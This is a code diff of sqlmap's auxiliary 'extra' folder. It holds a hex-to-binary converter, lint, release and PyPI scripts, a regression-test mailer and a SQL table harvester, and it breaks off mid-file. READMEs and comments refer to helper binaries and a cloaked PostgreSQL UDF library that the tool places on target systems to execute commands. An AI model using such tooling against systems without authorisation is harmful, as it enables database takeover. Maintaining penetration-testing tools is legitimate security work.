-# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-# THE SOFTWARE.
-#
-
-pass

extra/pagerank/pagerank.py

@@ -1,75 +0,0 @@
-#!/usr/bin/env python
-#
-#  Script for getting Google Page Rank of page
-#  Google Toolbar 3.0.x/4.0.x Pagerank Checksum Algorithm
-#
-#  original from http://pagerank.gamesaga.net/
-#  this version was adapted from http://www.djangosnippets.org/snippets/221/
-#  by Corey Goldberg - 2010
-#
-#  Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
-
-import urllib
-
-def get_pagerank(url):
-    hsh = check_hash(hash_url(url))
-    gurl = 'http://www.google.com/search?client=navclient-auto&features=Rank:&q=info:%s&ch=%s' % (urllib.quote(url), hsh)
-    try:
-        f = urllib.urlopen(gurl)
-        rank = f.read().strip()[9:]
-    except Exception:
-        rank = 'N/A'
-    if rank == '':
-        rank = '0'
-    return rank
-
-def int_str(string, integer, factor):
-    for i in range(len(string)) :
-        integer *= factor
-        integer &= 0xFFFFFFFF
-        integer += ord(string[i])
-    return integer
-
-def hash_url(string):
-    c1 = int_str(string, 0x1505, 0x21)
-    c2 = int_str(string, 0, 0x1003F)
-
-    c1 >>= 2
-    c1 = ((c1 >> 4) & 0x3FFFFC0) | (c1 & 0x3F)
-    c1 = ((c1 >> 4) & 0x3FFC00) | (c1 & 0x3FF)
-    c1 = ((c1 >> 4) & 0x3C000) | (c1 & 0x3FFF)
-
-    t1 = (c1 & 0x3C0) << 4
-    t1 |= c1 & 0x3C
-    t1 = (t1 << 2) | (c2 & 0xF0F)
-
-    t2 = (c1 & 0xFFFFC000) << 4
-    t2 |= c1 & 0x3C00
-    t2 = (t2 << 0xA) | (c2 & 0xF0F0000)
-
-    return (t1 | t2)
-
-def check_hash(hash_int):
-    hash_str = '%u' % (hash_int)
-    flag = 0
-    check_byte = 0
-
-    i = len(hash_str) - 1
-    while i >= 0:
-        byte = int(hash_str[i])
-        if 1 == (flag % 2):
-            byte *= 2;
-            byte = byte / 10 + byte % 10
-        check_byte += byte
-        flag += 1
-        i -= 1
-
-    check_byte %= 10
-    if 0 != check_byte:
-        check_byte = 10 - check_byte
-        if 1 == flag % 2:
-            if 1 == check_byte % 2:
-                check_byte += 9
-            check_byte >>= 1
-
-    return '7' + str(check_byte) + hash_str

extra/runcmd/README.txt

@@ -1,7 +1,3 @@
-Files in this folder can be used to compile auxiliary program that can
-be used for running command prompt commands skipping standard "cmd /c" way. 
-They are licensed under the terms of the GNU Lesser General Public License 
-and it's compiled version is available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
+runcmd.exe is an auxiliary program that can be used for running command prompt
+commands skipping standard "cmd /c" way. It is licensed under the terms of the
+GNU Lesser General Public License.

extra/safe2bin/README.txt

@@ -0,0 +1,17 @@
+To use safe2bin.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./safe2bin.py -i output.txt -o output.txt.bin
+
+This will create an binary decoded file output.txt.bin. For example, 
+if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will 
+be decoded to: "	test	234
+newline"
+
+If you skip the output file name, general rule is that the binary
+file names are suffixed with the string '.bin'. So, that means that 
+the upper example can also be written in the following form:
+
+$ python ./safe2bin.py -i output.txt

extra/safe2bin/__init__.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

extra/safe2bin/safe2bin.py

@@ -0,0 +1,130 @@
+#!/usr/bin/env python
+
+"""
+safe2bin.py - Simple safe(hex) to binary format converter
+
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import binascii
+import re
+import string
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+# Regex used for recognition of hex encoded characters
+HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
+
+# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n)
+SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
+
+# Characters that don't need to be safe encoded
+SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
+
+# Prefix used for hex encoded values
+HEX_ENCODED_PREFIX = r"\x"
+
+# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding)
+HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__"
+
+# String used for temporary marking of slash characters
+SLASH_MARKER = "__SLASH__"
+
+def safecharencode(value):
+    """
+    Returns safe representation of a given basestring value
+
+    >>> safecharencode(u'test123')
+    u'test123'
+    >>> safecharencode(u'test\x01\x02\xff')
+    u'test\\01\\02\\03\\ff'
+    """
+
+    retVal = value
+
+    if isinstance(value, basestring):
+        if any([_ not in SAFE_CHARS for _ in value]):
+            retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
+            retVal = retVal.replace('\\', SLASH_MARKER)
+
+            for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
+                retVal = retVal.replace(char, repr(char).strip('\''))
+
+            retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
+
+            retVal = retVal.replace(SLASH_MARKER, "\\\\")
+            retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)
+    elif isinstance(value, list):
+        for i in xrange(len(value)):
+            retVal[i] = safecharencode(value[i])
+
+    return retVal
+
+def safechardecode(value, binary=False):
+    """
+    Reverse function to safecharencode
+    """
+
+    retVal = value
+    if isinstance(value, basestring):
+        retVal = retVal.replace('\\\\', SLASH_MARKER)
+
+        while True:
+            match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)
+            if match:
+                retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x")))))
+            else:
+                break
+
+        for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]:
+            retVal = retVal.replace(repr(char).strip('\''), char)
+
+        retVal = retVal.replace(SLASH_MARKER, '\\')
+
+        if binary:
+            if isinstance(retVal, unicode):
+                retVal = retVal.encode("utf8")
+
+    elif isinstance(value, (list, tuple)):
+        for i in xrange(len(value)):
+            retVal[i] = safechardecode(value[i])
+
+    return retVal
+
+def main():
+    usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
+    parser = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+
+    f = open(args.inputFile, 'r')
+    data = f.read()
+    f.close()
+
+    if not args.outputFile:
+        args.outputFile = args.inputFile + '.bin'
+
+    f = open(args.outputFile, 'wb')
+    f.write(safechardecode(data))
+    f.close()
+
+if __name__ == '__main__':
+    main()

extra/shellcodeexec/README.txt

@@ -0,0 +1,4 @@
+Binary files in this folder are data files used by sqlmap on the target
+system, but not executed on the system running sqlmap. They are licensed
+under the terms of the GNU Lesser General Public License and their source
+code is available on https://github.com/inquisb/shellcodeexec.

extra/shutils/blanks.sh

@@ -1,9 +1,7 @@
 #!/bin/bash
 
-# $Id$
-
-# Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # Removes trailing spaces from blank lines inside project files
-find ../../. -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
+find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;

extra/shutils/duplicates.py

@@ -1,37 +1,27 @@
 #!/usr/bin/env python
 
-"""
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
-See the file 'doc/COPYING' for copying permission
-"""
+# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
 
 # Removes duplicate entries in wordlist like files
 
 import sys
 
 if len(sys.argv) > 0:
-
     items = list()
-    f = open(sys.argv[1], 'r')
 
-    for item in f.readlines():
-        item = item.strip()
-        try:
-            str.encode(item)
-            if item in items:
-                if item:
-                    print item
-            else:
-                items.append(item)
+    with open(sys.argv[1], 'r') as f:
+        for item in f.readlines():
+            item = item.strip()
+            try:
+                str.encode(item)
+                if item in items:
+                    if item:
+                        print item
+                else:
+                    items.append(item)
+            except:
+                pass
 
-            if not item:
-                items.append('')
-        except:
-            pass
-    f.close()
-
-    f = open(sys.argv[1], 'w+')
-    f.writelines("\n".join(items))
-    f.close()
+    with open(sys.argv[1], 'w+') as f:
+        f.writelines("\n".join(items))

extra/shutils/id.sh

@@ -1,9 +0,0 @@
-#!/bin/bash
-
-# $Id$
-
-# Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
-# See the file 'doc/COPYING' for copying permission
-
-# Adds SVN property 'Id' to project files
-find ../../. -type f -name "*.py" -exec svn propset svn:keywords "Id" '{}' \;

extra/shutils/pep8.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Runs pep8 on all python files (prerequisite: apt-get install pep8)
+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;

extra/shutils/postcommit-hook.sh

@@ -0,0 +1,23 @@
+#!/bin/bash
+
+SETTINGS="../../lib/core/settings.py"
+
+declare -x SCRIPTPATH="${0}"
+
+FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
+
+if [ -f $FULLPATH ]
+then
+    LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"')
+    declare -a LINE
+    NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
+    if [ -n "$NEW_TAG" ]
+    then
+        #git commit -am "Automatic monthly tagging"
+        echo "Creating new tag ${NEW_TAG}"
+        git tag $NEW_TAG
+        git push origin $NEW_TAG
+        echo "Going to push PyPI package"
+        /bin/bash ${SCRIPTPATH%/*}/pypi.sh
+    fi
+fi

extra/shutils/precommit-hook.sh

@@ -0,0 +1,32 @@
+#!/bin/bash
+
+PROJECT="../../"
+SETTINGS="../../lib/core/settings.py"
+CHECKSUM="../../txt/checksum.md5"
+
+declare -x SCRIPTPATH="${0}"
+
+PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT
+SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
+CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM
+
+git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0
+
+if [ -f $SETTINGS_FULLPATH ]
+then
+    LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
+    declare -a LINE
+    INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
+    if [ -n "$INCREMENTED" ]
+    then
+        sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
+        echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}"
+    else
+        echo "Something went wrong in VERSION increment"
+        exit 1
+    fi
+    git add "$SETTINGS_FULLPATH"
+fi
+
+truncate -s 0 "$CHECKSUM_FULLPATH"
+cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done

extra/shutils/pydiatra.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Runs py2diatra on all python files (prerequisite: pip install pydiatra)
+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except

extra/shutils/pyflakes.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;

extra/shutils/pylint.py

@@ -18,15 +18,15 @@ def check(module):
     if module[-3:] == ".py":
 
         print "CHECKING ", module
-        pout = os.popen('pylint --rcfile=/dev/null %s'% module, 'r')
+        pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
         for line in pout:
-            if  re.match("E....:.", line):
-                print line
+            if  re.match("\AE:", line):
+                print line.strip()
             if __RATING__ and "Your code has been rated at" in line:
-               print line
-               score = re.findall("\d.\d\d", line)[0]
-               total += float(score)
-               count += 1
+                print line
+                score = re.findall("\d.\d\d", line)[0]
+                total += float(score)
+                count += 1
 
 if __name__ == "__main__":
     try:
@@ -38,11 +38,13 @@ if __name__ == "__main__":
 
     print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
     for root, dirs, files in os.walk(BASE_DIRECTORY):
+        if any(_ in root for _ in ("extra", "thirdparty")):
+            continue
         for name in files:
             filepath = os.path.join(root, name)
             check(filepath)
 
     if __RATING__:
         print "==" * 50
-        print "%d modules found"% count
-        print "AVERAGE SCORE = %.02f"% (total / count)
+        print "%d modules found" % count
+        print "AVERAGE SCORE = %.02f" % (total / count)

extra/shutils/pypi.sh

@@ -0,0 +1,176 @@
+#!/bin/bash
+
+if [ ! -f ~/.pypirc ]; then
+    echo "File ~/.pypirc is missing"
+    exit 1
+fi
+
+declare -x SCRIPTPATH="${0}"
+SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
+VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
+TYPE=pip
+TMP_DIR=/tmp/pypi
+mkdir $TMP_DIR
+cd $TMP_DIR
+cat > $TMP_DIR/setup.py << EOF
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from setuptools import setup, find_packages
+
+setup(
+    name='sqlmap',
+    version='$VERSION',
+    description="Automatic SQL injection and database takeover tool",
+    author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
+    author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
+    url='https://sqlmap.org',
+    download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
+    license='GNU General Public License v2 (GPLv2)',
+    packages=find_packages(),
+    include_package_data=True,
+    zip_safe=False,
+    # https://pypi.python.org/pypi?%3Aaction=list_classifiers
+    classifiers=[
+        'Development Status :: 5 - Production/Stable',
+        'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
+        'Natural Language :: English',
+        'Operating System :: OS Independent',
+        'Programming Language :: Python',
+        'Environment :: Console',
+        'Topic :: Database',
+        'Topic :: Security',
+    ],
+    entry_points={
+        'console_scripts': [
+            'sqlmap = sqlmap.sqlmap:main',
+        ],
+    },
+)
+EOF
+wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip
+unzip sqlmap.zip
+rm sqlmap.zip
+mv "sqlmap-$VERSION" sqlmap
+cat > sqlmap/__init__.py << EOF
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import sys
+
+sys.dont_write_bytecode = True
+sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
+EOF
+cat > README.rst << "EOF"
+sqlmap
+======
+
+|Build Status| |Python 2.6|2.7| |License| |Twitter|
+
+sqlmap is an open source penetration testing tool that automates the
+process of detecting and exploiting SQL injection flaws and taking over
+of database servers. It comes with a powerful detection engine, many
+niche features for the ultimate penetration tester and a broad range of
+switches lasting from database fingerprinting, over data fetching from
+the database, to accessing the underlying file system and executing
+commands on the operating system via out-of-band connections.
+
+Screenshots
+-----------
+
+.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png
+   :alt: Screenshot
+
+
+You can visit the `collection of
+screenshots <https://github.com/sqlmapproject/sqlmap/wiki/Screenshots>`__
+demonstrating some of features on the wiki.
+
+Installation
+------------
+
+You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: ::
+
+    pip install --upgrade sqlmap
+
+Alternatively, you can download the latest tarball by clicking
+`here <https://github.com/sqlmapproject/sqlmap/tarball/master>`__ or
+latest zipball by clicking
+`here <https://github.com/sqlmapproject/sqlmap/zipball/master>`__.
+
+If you prefer fetching daily updates, you can download sqlmap by cloning the
+`Git <https://github.com/sqlmapproject/sqlmap>`__ repository:
+
+::
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with
+`Python <http://www.python.org/download/>`__ version **2.6.x** and
+**2.7.x** on any platform.
+
+Usage
+-----
+
+To get a list of basic options and switches use:
+
+::
+
+    python sqlmap.py -h
+
+To get a list of all options and switches use:
+
+::
+
+    python sqlmap.py -hh
+
+You can find a sample run `here <https://asciinema.org/a/46601>`__. To
+get an overview of sqlmap capabilities, list of supported features and
+description of all options and switches, along with examples, you are
+advised to consult the `user's
+manual <https://github.com/sqlmapproject/sqlmap/wiki/Usage>`__.
+
+Links
+-----
+
+-  Homepage: http://sqlmap.org
+-  Download:
+   `.tar.gz <https://github.com/sqlmapproject/sqlmap/tarball/master>`__
+   or `.zip <https://github.com/sqlmapproject/sqlmap/zipball/master>`__
+-  Commits RSS feed:
+   https://github.com/sqlmapproject/sqlmap/commits/master.atom
+-  Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+-  User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+-  Frequently Asked Questions (FAQ):
+   https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+-  Twitter: [@sqlmap](https://twitter.com/sqlmap)
+-  Demos: http://www.youtube.com/user/inquisb/videos
+-  Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master
+   :target: https://api.travis-ci.org/sqlmapproject/sqlmap
+.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
+   :target: https://www.python.org/
+.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
+   :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING
+.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
+   :target: https://twitter.com/sqlmap
+
+.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md
+.. http://rst.ninjs.org/
+EOF
+sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py
+sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py
+sed -i "s/.*lib\/core\/settings\.py/`md5sum sqlmap/lib/core/settings.py | cut -d ' ' -f 1`  lib\/core\/settings\.py/g" sqlmap/txt/checksum.md5
+for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
+python setup.py sdist upload
+rm -rf $TMP_DIR

extra/shutils/regressiontest.py

@@ -0,0 +1,164 @@
+#!/usr/bin/env python
+
+# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+import codecs
+import inspect
+import os
+import re
+import smtplib
+import subprocess
+import sys
+import time
+import traceback
+
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+
+sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe()))))
+
+from lib.core.revision import getRevisionNumber
+
+START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
+SQLMAP_HOME = "/opt/sqlmap"
+
+SMTP_SERVER = "127.0.0.1"
+SMTP_PORT = 25
+SMTP_TIMEOUT = 30
+FROM = "regressiontest@sqlmap.org"
+#TO = "dev@sqlmap.org"
+TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
+SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
+TARGET = "debian"
+
+def prepare_email(content):
+    global FROM
+    global TO
+    global SUBJECT
+
+    msg = MIMEMultipart()
+    msg["Subject"] = SUBJECT
+    msg["From"] = FROM
+    msg["To"] = TO if isinstance(TO, basestring) else ','.join(TO)
+
+    msg.attach(MIMEText(content))
+
+    return msg
+
+def send_email(msg):
+    global SMTP_SERVER
+    global SMTP_PORT
+    global SMTP_TIMEOUT
+
+    try:
+        s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT)
+        s.sendmail(FROM, TO, msg.as_string())
+        s.quit()
+    # Catch all for SMTP exceptions
+    except smtplib.SMTPException, e:
+        print "Failure to send email: %s" % str(e)
+
+def failure_email(msg):
+    msg = prepare_email(msg)
+    send_email(msg)
+    sys.exit(1)
+
+def main():
+    global SUBJECT
+
+    content = ""
+    test_counts = []
+    attachments = {}
+
+    updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    stdout, stderr = updateproc.communicate()
+
+    if stderr:
+        failure_email("Update of sqlmap failed with error:\n\n%s" % stderr)
+
+    regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False)
+    stdout, stderr = regressionproc.communicate()
+
+    if stderr:
+        failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
+
+    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
+
+    for failed_test in failed_tests:
+        title = failed_test[0]
+        test_count = int(failed_test[1])
+        parse = failed_test[3] if failed_test[3] else None
+        output_folder = failed_test[4]
+        traceback = False if failed_test[5] == "False" else bool(failed_test[5])
+        detected = False if failed_test[6] else True
+
+        test_counts.append(test_count)
+
+        console_output_file = os.path.join(output_folder, "console_output")
+        log_file = os.path.join(output_folder, TARGET, "log")
+        traceback_file = os.path.join(output_folder, "traceback")
+
+        if os.path.exists(console_output_file):
+            console_output_fd = codecs.open(console_output_file, "rb", "utf8")
+            console_output = console_output_fd.read()
+            console_output_fd.close()
+            attachments[test_count] = str(console_output)
+
+        if os.path.exists(log_file):
+            log_fd = codecs.open(log_file, "rb", "utf8")
+            log = log_fd.read()
+            log_fd.close()
+
+        if os.path.exists(traceback_file):
+            traceback_fd = codecs.open(traceback_file, "rb", "utf8")
+            traceback = traceback_fd.read()
+            traceback_fd.close()
+
+        content += "Failed test case '%s' (#%d)" % (title, test_count)
+
+        if parse:
+            content += " at parsing: %s:\n\n" % parse
+            content += "### Log file:\n\n"
+            content += "%s\n\n" % log
+        elif not detected:
+            content += " - SQL injection not detected\n\n"
+        else:
+            content += "\n\n"
+
+        if traceback:
+            content += "### Traceback:\n\n"
+            content += "%s\n\n" % str(traceback)
+
+        content += "#######################################################################\n\n"
+
+    end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
+
+    if content:
+        content += end_string
+        SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts))
+
+        msg = prepare_email(content)
+
+        for test_count, attachment in attachments.items():
+            attachment = MIMEText(attachment)
+            attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count)
+            msg.attach(attachment)
+
+        send_email(msg)
+    else:
+        SUBJECT = "Successful %s" % SUBJECT
+        msg = prepare_email("All test cases were successful\n\n%s" % end_string)
+        send_email(msg)
+
+if __name__ == "__main__":
+    log_fd = open("/tmp/sqlmapregressiontest.log", "wb")
+    log_fd.write("Regression test started at %s\n" % START_TIME)
+
+    try:
+        main()
+    except Exception, e:
+        log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))
+
+    log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
+    log_fd.close()

extra/shutils/strip.sh

@@ -0,0 +1,15 @@
+#!/bin/bash
+
+# References:   http://www.thegeekstuff.com/2012/09/strip-command-examples/
+#               http://www.muppetlabs.com/~breadbox/software/elfkickers.html
+#               https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html
+
+# For example:
+# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_
+# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so
+# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so
+# rm lib_postgresqludf_sys.so
+
+strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*
+sstrip $*
+

extra/sqlharvest/__init__.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

extra/sqlharvest/sqlharvest.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -17,66 +15,62 @@ import ConfigParser
 
 from operator import itemgetter
 
+TIMEOUT = 10
+CONFIG_FILE = 'sqlharvest.cfg'
+TABLES_FILE = 'tables.txt'
+USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)'
+SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic'
+MAX_FILE_SIZE = 2 * 1024 * 1024  # if a result (.sql) file for downloading is more than 2MB in size just skip it
+QUERY = 'CREATE TABLE ext:sql'
+REGEX_URLS = r';u=([^"]+?)&q='
+REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)'
+
 def main():
-
-    TIMEOUT         = 10
-    CONFIG_FILE     = 'sqlharvest.cfg'
-    TABLES_FILE     = 'tables.txt'
-    USER_AGENT      = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)'
-    SEARCH_URL      = 'http://www.google.com/m?source=mobileproducts&dc=gorganic'
-    MAX_FILE_SIZE   = 2*1024*1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it
-    QUERY           = 'CREATE TABLE ext:sql'
-    REGEX_URLS      = r';u=([^"]+)'
-    REGEX_RESULT    = r'CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)'
-
     tables = dict()
-    refiles = re.compile(REGEX_URLS)
-    retables = re.compile(REGEX_RESULT, re.I)
-
     cookies = cookielib.CookieJar()
     cookie_processor = urllib2.HTTPCookieProcessor(cookies)
     opener = urllib2.build_opener(cookie_processor)
-    opener.addheaders = [('User-Agent', USER_AGENT)]
+    opener.addheaders = [("User-Agent", USER_AGENT)]
 
     conn = opener.open(SEARCH_URL)
-    page = conn.read() #set initial cookie values
+    page = conn.read()  # set initial cookie values
 
     config = ConfigParser.ConfigParser()
     config.read(CONFIG_FILE)
-    if not config.has_section('options'):
-        config.add_section('options')
 
-    if not config.has_option('options',  'index'):
-        config.set('options',  'index', '0')
+    if not config.has_section("options"):
+        config.add_section("options")
+    if not config.has_option("options", "index"):
+        config.set("options", "index", "0")
 
-    i = int(config.get('options',  'index'))
+    i = int(config.get("options", "index"))
 
     try:
-        f = open(TABLES_FILE, 'r')
-        for line in f.xreadlines():
-            if len(line) > 0 and ',' in line:
-                temp = line.split(',')
-                tables[temp[0]] = int(temp[1])
-        f.close()
+        with open(TABLES_FILE, 'r') as f:
